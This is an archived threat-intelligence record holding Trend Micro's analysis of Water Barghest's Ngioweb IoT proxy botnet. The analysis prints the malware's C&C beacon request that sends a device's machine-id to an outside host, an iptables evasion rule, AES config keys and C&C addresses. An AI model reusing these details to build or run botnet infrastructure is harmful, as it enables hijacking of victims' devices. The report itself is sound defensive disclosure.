{ "id": "ced23879-0279-40fd-9cc8-1f7ae9d15c77", "created_at": "2026-04-06T00:17:40.215288Z", "updated_at": "2026-04-10T03:37:50.441692Z", "deleted_at": null, "sha1_hash": "79aeb957afda5a5e39a5095e4b28efed523574c6", "title": "Inside Water Barghest’s Rapid Exploit-to-Market Strategy for IoT Devices", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1665945, "plain_text": "Inside Water Barghest’s Rapid Exploit-to-Market Strategy for IoT\r\nDevices\r\nBy By: Feike Hacquebord, Fernando Mercês 18/11/2024 Read time: 12 min (3342 words)\r\nPublished: 2024-11-18 · Archived: 2026-04-05 20:38:26 UTC\r\nIoT\r\nIn this blog entry, we discuss Water Barghest's exploitation of IoT devices, transforming them into profitable\r\nassets through advanced automation and monetization techniques.\r\n \r\nSave to Folio\r\nSummary\r\nWater Barghest, which comprised over 20,000 IoT devices by October 2024, monetizes IoT devices by\r\nexploiting vulnerabilities and quickly enlisting them for sale on a residential proxy marketplace.\r\nIts botnet uses automated scripts to find and compromise vulnerable IoT devices sourced from public\r\ninternet scan databases like Shodan.\r\nOnce IoT devices are compromised, the Ngioweb malware is deployed, which runs in memory and\r\nconnects to command-and-control servers to register the compromised device as a proxy.\r\nThe monetization process, from initial infection to the availability of the device as a proxy on a residential\r\nproxy marketplace, can take as little as 10 minutes, indicating a highly efficient and automated operation.\r\nThere is a big incentive for both espionage motivated actors and financially motivated actors to set up proxy\r\nbotnets. These can serve as an anonymization layer, which can provide plausibly geolocated IP addresses to scrape\r\ncontents of websites, access stolen or compromised online assets, and launch cyber-attacks.\r\nExamples of proxy botnets set up by advanced persistent threat (APT) actors are the VPNFilter botnet and\r\nCyclops Blink, both deployed by Sandworm and disrupted by the Federal Bureau of Investigation (FBI) in 2018\r\nand 2022, respectively. Another example is the SOHO botnet alleged to be operated by a Chinese company called\r\nthe Beijing Integrity Technology Group; this botnet was disrupted in September 2024 by the FBI. The\r\ncybercriminal group Water Zmeu had a proxy botnet primarily consisting of Ubiquiti EdgeRouter devices, which\r\nwas used by nation state actor Pawn Storm (also known as APT28 and Forest Blizzard) for two years for their\r\nespionage campaigns.\r\nIn this blog entry, we discuss our findings on another proxy botnet we associate with Water Barghest’s intrusion\r\nset. This botnet was estimated to have more than 20,000 compromised Internet-of-Things (IoT) devices in October\r\n2024. The starting point of our discovery of Water Barghest’s intrusion set was our decade-old research into nation\r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 1 of 13\n\nstate actor Pawn Storm. Many Ubiquiti EdgeRouter devices had been used by this nation state actor since April\r\n2022 in their espionage campaigns. Ubiquiti routers were the source of spear-phishing e-mails to numerous\r\ngovernment organizations all over the world; they were used as SMB reflectors in NTLMv2 hash relay attacks,\r\nand they served as proxies to send stolen credentials on phishing websites to upstream servers.\r\nIn January 2024, the FBI tried to stop these espionage campaigns by disrupting the third-party criminal router\r\nbotnet that Pawn Storm was using. We associate this router botnet that consisted primarily of Ubiquiti EdgeRouter\r\ndevices with the Water Zmeu intrusion set. During our investigation, we got our hands on a couple of the\r\nEdgeRouter devices that had been used by Pawn Storm, and we indeed found traces of espionage campaigns, and\r\nthe router malware of Water Zmeu. We also found mysterious processes running in memory only, called um or\r\nmm. These processes appeared to be instances of Ngioweb malware running in memory, and this led us to the\r\ndiscovery of the Ngioweb botnet of Water Barghest. Apparently, some cybercriminals and APT actors share\r\ncompromised infrastructure knowingly or unknowingly.\r\nFor more than five years, no significant publications were done on the Ngioweb botnet of Water Barghest while\r\nthe botnet was up and running. This means that the actor group behind Water Barghest managed to keep a low\r\nprofile. Like several other cybercriminals, Water Barghest did not make headlines in the news because of their\r\ncareful operational security and high degree of automation. They had a steady income fueled by their\r\ncybercriminal activities, but they did not get the scrutiny they deserved. They quietly erased log files from their\r\nservers and made forensic analysis more difficult. They removed human error from their operations by automating\r\nalmost everything. They also removed financial traceability by using cryptocurrency for anonymous payments.\r\nHowever, they slipped up and suddenly had the spotlight pointed on them. This was because of a misjudgment, an\r\noperational mistake, or by using a vulnerability that made them greedy. One example of this is the well-mediatized\r\nusage of the zero-day vulnerability that was used against Cisco IOS XE devices in October 2023. Tens of\r\nthousands of Cisco routers were affected, and naturally, this sparked the interest of the security industry. We, too,\r\nbecame interested in the ever-intriguing question of whodunnit, and ultimately, we solved it at the technical level:\r\nWe found that the attackers’ infrastructure that was used to compromise thousands of Cisco IOS XE routers\r\nbelonged to the five-year-old intrusion set of Water Barghest. This makes it very plausible that it was the Water\r\nBarghest group who had used the Cisco IOS XE device zero-day in October 2023.\r\nAnd yet, even without the seemingly reckless usage of the Cisco IOS XE zero-day against tens thousands of\r\nrouters, we would have discovered Water Barghest’s router botnet operations anyway through our decade-long\r\nresearch into Pawn Storm as mentioned above. A series of seemingly unrelated events led us to the discovery of\r\nthe way Water Barghest had automated every step between finding vulnerable routers and IoT devices on the\r\ninternet, exploiting these devices, uploading and executing malware on them, and then monetizing the\r\ncompromised assets for a steady income on an online marketplace of residential proxies.\r\nOne of the striking characteristics of the Water Barghest botnet is its high degree of automation, which will be\r\ndiscussed in the following section.\r\nWater Barghest’s automation\r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 2 of 13\n\nAs far as we know, apart from acquiring IoT exploits, Water Barghest has automated each step between finding\r\nvulnerable IoT devices and putting them for sale on a residential proxy marketplace (Figure 1). However, it all\r\nstarts with acquiring IoT device vulnerabilities: Oftentimes these will be n-days, but in at least one case Water\r\nBarghest utilized a zero-day. With a list of exploits in hand, Water Barghest uses search queries on a publicly\r\navailable Internet scan database like Shodan to find vulnerable devices and their IP addresses.\r\nAfter retrieving these IP addresses, Water Barghest uses a set of data-center IP addresses with an oftentimes big\r\nlongevity to try the exploits against potentially vulnerable IoT devices. When an exploit is successful, the\r\ncompromised IoT devices download a script that iterates through Ngioweb malware samples that are compiled for\r\ndifferent Linux architectures. When one of the samples runs fine, the malware Ngioweb will run in memory on the\r\nvictim’s IoT device. This means that the infection is not persistent; a reboot would remove the infection. When\r\nNgioweb runs, it will register with a command-and-control (C\u0026C) server. Oftentimes, within minutes the bot will\r\nreceive instructions to connect to one of the residential proxy provider’s 150 entry points (Figure 2). A speed test\r\nand name server test will follow, and the information will be sent to and be listed on the marketplace. The whole\r\nprocedure between initial infection and making the bot available as a proxy on the marketplace may take no longer\r\nthan 10 minutes. This shows again the professionalism and maturity of this threat actor, who has been around for\r\nmore than five years.\r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 3 of 13\n\nAt the time of writing, Water Barghest deploys about 17 workers on virtual private servers (VPS) that\r\ncontinuously scan routers and IoT devices for known vulnerabilities. The same workers are also used to upload\r\nNgioweb malware to freshly compromised IoT devices. Water Barghest has probably been using this mode of\r\noperation for years, with the worker IP addresses changing slowly over time. This setup allowed for a steady\r\nincome for Water Barghest for years. \r\nNgioweb malware evolution\r\n2018: Ramnit-powered Windows botnet\r\nThe Ngioweb malware strain goes back to 2018, when Check Point Research revealed it was being dropped by a\r\nRamnit Trojan. At the time, Ngioweb targeted computers using the Microsoft Windows operating system. The\r\nmalware was already designed for turning an infected machine into a malicious proxy server. A few samples even\r\ngo back to 2017, but the command-and-control (C\u0026C) domain that gives the malware name was registered in\r\n2018: ngioweb[.]su. If you're curious about the .su top-level domain (TLD), it’s associated with the Soviet Union,\r\nand although the USSR doesn’t exist anymore, the TLD is still valid.\r\n2019: WordPress servers botnet\r\nIn 2019, Netlab researchers found the Linux variant of Ngioweb. The malware worked similarly to its previous\r\nWindows version, but it had domain generation algorithm (DGA) features added. According to Netlab, the botnet\r\nwas built mostly of web servers with WordPress installed, which suggests the threat actor could be exploiting a\r\nWordPress – or a WordPress plugin – vulnerability.\r\nOne of the parameters sent to the first stage C\u0026C server was the ‘sv’ parameter (likely short for “software\r\nversion”), which contained the value 5003. Just like its Windows version, Ngioweb used two-stage C\u0026C servers\r\nand implemented its own binary protocol over TCP for communicating with the second-stage C\u0026C server.\r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 4 of 13\n\n2020: IoT devices botnet\r\nIn 2020, Water Barghest changed their targets to IoT devices. We found Ngioweb samples compiled for many\r\ndifferent architectures. Additionally, Netlab published a blog entry and Intezer posted on X about a live Ngioweb\r\nbotnet. According to Netlab, the threat actor was exploiting nine different n-day vulnerabilities in IoT devices; this\r\nincluded NAS devices from QNAP and Netgear, but also D-Link devices, among others. The software version\r\ndefined at the ‘sv’ field was changed to 0005.The software version defined at the ‘sv’ field was changed to 0005.\r\n2024: Expanded targets\r\nIn 2024, we saw the IoT botnet created by Water Barghest at its full potential. The processes we found running in\r\na bunch of EdgeRouter devices turned out to be a new version of Ngioweb. It works very similarly to its previous\r\nversions. When running, the malware performs the following actions:\r\nInitialize function pointers in runtime, which makes static analysis harder.\r\nIgnore any ignorable signals received by the kernel.\r\nRenames itself to “[kworker/0:1]” in a tentative to look like a kernel thread in the process list.\r\nCloses stdin, stdout, and stderr file descriptors to prevent any error reporting.\r\nDisables kernel’s watchdog, effectively preventing it from rebooting the device.\r\nReads the contents of /etc/machine-id (will be sent to the first-stage C\u0026C later).\r\nDecrypts its AES-256-ECB (no padding) encrypted configuration.\r\nGenerates and tries to resolve the DGA domains of the first-stage C\u0026C.\r\nIts main function is shown in Figure 3.\r\nThe encrypted configuration is usually at the beginning of the .data section. In the following sample the key is at\r\noffset 0x0c from the start of the .data section and the encrypted data blob is 512 byte in size (Figure 4).\r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 5 of 13\n\nThe encrypted configuration includes the ‘sv’ value, DGA seed and count, and C\u0026C URL path, among other\r\nsettings we didn’t fully analyze. Figure 5 shows a decrypted configuration with highlighted values of ‘sv’, DGA\r\nseed and count, C\u0026C port and C\u0026C URL path, respectively.\r\nWe’ve also created a Python script to decrypt Ngioweb samples configuration, which is available in our GitHub\r\nrepository. The following is an example output:\r\nPS D:\\ \u003e python ngioweb_config_extractor.py c267e0\r\n[DEBUG] AES key found at offset 0xc from .data section\r\nAES key (hex): db1f96b20679f9fb9cbd96b242ab8530102c0105b64c83c3ae544f87594a6fa9\r\nDGA seed (hex): 0221d333\r\nDGA count: 1000\r\nURL path: /jquery.js\r\nsv: 271a\r\nFor every generated domain the malware tries to resolve with A/AAAA requests, it also sends a TXT request\r\nexpecting a base64-encoded binary blob (Figures 6 and 7). \r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 6 of 13\n\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 7 of 13\n\nUnfortunately, we didn’t finish the full analysis of how this binary blob is used. Nonetheless, the next stage is to\r\nsend a GET request to the C\u0026C server. Like its previous versions, this request is an unencrypted request at port\r\n443/tcp and contains some base64-encoded data that identifies the victim:\r\nGET /jquery.js?\r\nh=aWQ9MDEyMzQ1Njc4OWFiY2RlZiZ2PWFybXY3bCZzdj0yNzFhJnlic25xbndmYXR5anV0c2w=\r\nHTTP/1.1\\r\\n\r\nHost: ultradomafy.net\\r\\n\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\\r\\n\r\nAccept: text/html\\r\\n\r\nConnection: close\\r\\n\r\n\\r\\n\r\nThe sample base64-decoded data is as follows:\r\nid=0123456789abcdef\u0026v=armv7l\u0026sv=271a\u0026ybsnqnwfatyjutsl\r\nid - first 16 characters from /etc/machine-id\r\nv - architecture of the infected device\r\nsv - software version (assumed)\r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 8 of 13\n\n\u003crandom string with 16 lowercase letters\u003e\r\nIn this version, the ‘sv’ parameter changed to 271a.\r\nThe first-stage C\u0026C server response has the following format:\r\nHTTP/1.1 200 OK\\r\\n\r\nServer: openresty/1.19.9.1\\r\\n\r\nDate: Mon, 11 Mar 2024 23:23:47 GMT\\r\\n\r\nContent-Type: text/plain; charset=utf-8\\r\\n\r\nContent-Length: 8\\r\\n\r\nConnection: close\\r\\n\r\n\\r\\n\r\nWAIT 60\\n\r\nThe above response contains the WAIT command, which instructs the malware to wait a few seconds before\r\nquerying the C\u0026C server again. Its parameter is the number of seconds to wait for (60 in the example).\r\nSupported commands are:\r\nWAIT\r\nCONNECT\r\nDISCONNECT\r\nCERT\r\nThis is paired with previous versions.\r\nDifferent child processes check if the following iptables rule is present:\r\niptables -I INPUT -p tcp --tcp-flags RST RST -j DROP --sport 5000:55000\r\nIf the rule is not already active in netfilter, the malware adds it. We believe this is to prevent connection resets,\r\nensuring its communication channels remain open.\r\nAfter waiting 60 seconds, the malware might get a different answer, as shown in Figure 8:\r\nThis instructs the malware to connect to a second-stage C\u0026C, 195.154.43.182 in this case. We associate this\r\nsecond-stage IP address with one of the about 150 entry nodes of the residential proxy service.\r\nBefore publishing the new victim’s IP address for sale as a reverse proxy on the residential proxy marketplace’s\r\nwebsite, the malware downloads a big file containing random bytes from the second-stage C\u0026C (Figure 9). \r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 9 of 13\n\nThis is to estimate the victim’s bandwidth, which we believe will be used to calculate the final price on the\r\nresidential proxy marketplace.\r\nIn this version, Water Barghest expanded Ngioweb’s list of targeted IoT devices, which now includes IoT devices\r\nfrom more brands, such as:\r\nCisco\r\nDrayTek\r\nFritz!Box\r\nLinksys\r\nNetgear\r\nSynology\r\nTenda\r\nWestern Digital\r\nZyxel\r\nWater Barghest has been targeting devices from the brands above with a range of n-day vulnerabilities and lots of\r\nold ones.\r\nResidential proxy marketplace\r\nIn our assessment, a significant part of the exit nodes that a particular residential proxy marketplace offers for rent\r\nbelong to devices that are infected with Ngioweb malware. In a couple of cases, we were able to verify that a fresh\r\nNgioweb infection resulted in the corresponding IP address being offered for rent on the marketplace’s website\r\nwithin a few minutes after the initial infection (Figure 10). The residential proxy provider allows for\r\ncryptocurrency payments only.\r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 10 of 13\n\nAs far as we can tell, the proxies on the residential proxy marketplace (Figure 11) are back connect proxies.\r\nNgioweb bots are instructed to connect to one of about 150 datacenter IP addresses we associate with the\r\nmarketplace that are also used as second-stage C\u0026C of Ngioweb-infected devices. Paying users of the residential\r\nproxy service can then connect to a temporary high TCP port on one of the 150 datacenter IP addresses, and then\r\nroute traffic through the Ngioweb bots.\r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 11 of 13\n\nWith data provided by Team Cymru’s Real-time Threat Intelligence Platform, Pure Signal Recon, we were able to\r\nexplicitly enumerate a significant part of the marketplace’s residential proxy network over time and verify that\r\nNgioweb bots were added to the marketplace’s offerings within 10 minutes after initial infection.\r\nOutlook and conclusions\r\nFor years, mid-sized proxy botnets have existed without them being disrupted and published on. Examples are the\r\nbotnets we associate with the Water Barghest and Water Zmeu intrusion sets. The actor groups behind these\r\nintrusion sets have made refinements in their setup over the years and automated their operations to a high degree.\r\nEventually, some of these botnets were brought to the attention of the security industry. In the case of Water\r\nBarghest, this was because of the use of Water Barghest’s infrastructure to deploy a zero-day against Cisco IOS\r\nXE devices that infected tens of thousands of routers in October 2023. In the case of Water Zmeu, APT actor Pawn\r\nStorm’s use of this criminal botnet for espionage purposes motivated the FBI to disrupt the Water Zmeu-associated router botnet. Upon completing our write-up on Water Barghest's activities, we became aware of a\r\nLevelBlue blog entry that partially overlaps with our findings.\r\nAPT actors have also deployed their dedicated IoT botnets sometimes for years, before they were disrupted by the\r\nFBI and its partners. APT actors and financially motivated actors will continue to have an interest in building their\r\nown IoT botnets for anonymization purposes and espionage. They also will continue to use third-party botnets or\r\ncommercially available residential proxy services.\r\nWe expect that both the commercial market for residential proxy services and the underground market of proxies\r\nwill grow in the coming years, because the demand from APT actors and cybercriminals actor groups is high.\r\nProtecting against these anonymization layers is a challenge for many enterprises and government organizations\r\naround the world. Court-approved disruptions of proxy botnets will help put a dent into malign operations, but it is\r\nbetter to do something against the source of the problem: securing IoT devices is of paramount importance, and\r\nwhenever possible, these devices should not be exposed to incoming connections from the open internet.\r\nWhenever an IoT device accepts incoming connections on the open internet, commercial scanning services will\r\nquickly find them online, and malicious actors can find them too via bought or stolen access to these internet\r\nscanning services. Using internet scan data, the automated scripts of bad actors can quickly try known\r\nvulnerabilities, and possibly even zero-days, against the exposed IoT devices. In the case of Water Barghest, we\r\nhave seen that the time between exploiting an IoT device and putting them for sale on a residential proxy\r\nmarketplace can be as little as 10 minutes. Therefore, it is important not to expose IoT devices to incoming\r\ninternet connections whenever it is not business-essential, and put mitigations in place to avoid their infrastructure\r\nbeing part of the problem itself.\r\nTrend Micro Vision One Threat Intelligence \r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat\r\nInsights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they\r\nhappen and better prepared for emerging threats. It offers comprehensive information on threat actors, their\r\nmalicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive\r\nsteps to protect their environments, mitigate risks, and respond effectively to threats.\r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 12 of 13\n\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nNgioweb IoCs used in Water Barghest Campaigns\r\nTrend Micro Vision One Threat Insights App\r\nThreat Actors: Water Barghest\r\nEmerging Threats: Water Barghest’s Rapid Exploit-to-Market Strategy for IoT Devices\r\nHunting Queries \r\nTrend Micro Vision One Search App\r\nTrend Micro Vision Once Customers can use the Search App to match or hunt the malicious indicators mentioned\r\nin this blog post with data in their environment.   \r\nDetection of Ngioweb Malware\r\nmalName:*NGIOWEB* AND eventName:MALWARE_DETECTION \r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabled.\r\nIndicators of Compromise (IOCs)\r\nThe full list of IOCs can be found here. For DGA-generated domains, please refer to this GitHub repository.\r\nYARA rules\r\nAs Ngioweb samples are highly obfuscated, an easy approach is to look for known AES keys in .data section.\r\nHowever, it is possible to find samples without section headers. In this case, searching for the AES key in the\r\nwhole binary (or in a loadable segment) does the job. There are also samples with an AES KEY\r\nc91795b59248562e44d6c07526c7ab89dfe45344293703a94a3ae5ff02eab5a4 that we believe could be part of\r\nsome test, so we didn’t include them in our IOC list. The YARA rules can be found here.\r\nTags\r\nSource: https://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 13 of 13\n\nIts main function The encrypted is shown in Figure configuration is 3. usually at the beginning of the .data section. In the following sample the key is at\noffset 0x0c from the start of the .data section and the encrypted data blob is 512 byte in size (Figure 4).\n Page 5 of 13 \n\nsv: 271a For every generated domain the malware tries to resolve with A/AAAA requests, it also sends a TXT request\nexpecting a base64-encoded binary blob (Figures 6 and 7).\n Page 6 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.trendmicro.com/pt_br/research/24/k/water-barghest.html" ], "report_names": [ "water-barghest.html" ], "threat_actors": [ { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "f9806b99-e392-46f1-9c13-885e376b239f", "created_at": "2023-01-06T13:46:39.431871Z", "updated_at": "2026-04-10T02:00:03.325163Z", "deleted_at": null, "main_name": "Watchdog", "aliases": [ "Thief Libra" ], "source_name": "MISPGALAXY:Watchdog", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a52a8c65-f0f5-4f89-b8cd-d963c8f5e9d0", "created_at": "2024-11-20T02:00:03.669397Z", "updated_at": "2026-04-10T02:00:03.778091Z", "deleted_at": null, "main_name": "Water Barghest", "aliases": [], "source_name": "MISPGALAXY:Water Barghest", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434660, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/79aeb957afda5a5e39a5095e4b28efed523574c6.pdf", "text": "https://archive.orkl.eu/79aeb957afda5a5e39a5095e4b28efed523574c6.txt", "img": "https://archive.orkl.eu/79aeb957afda5a5e39a5095e4b28efed523574c6.jpg" } }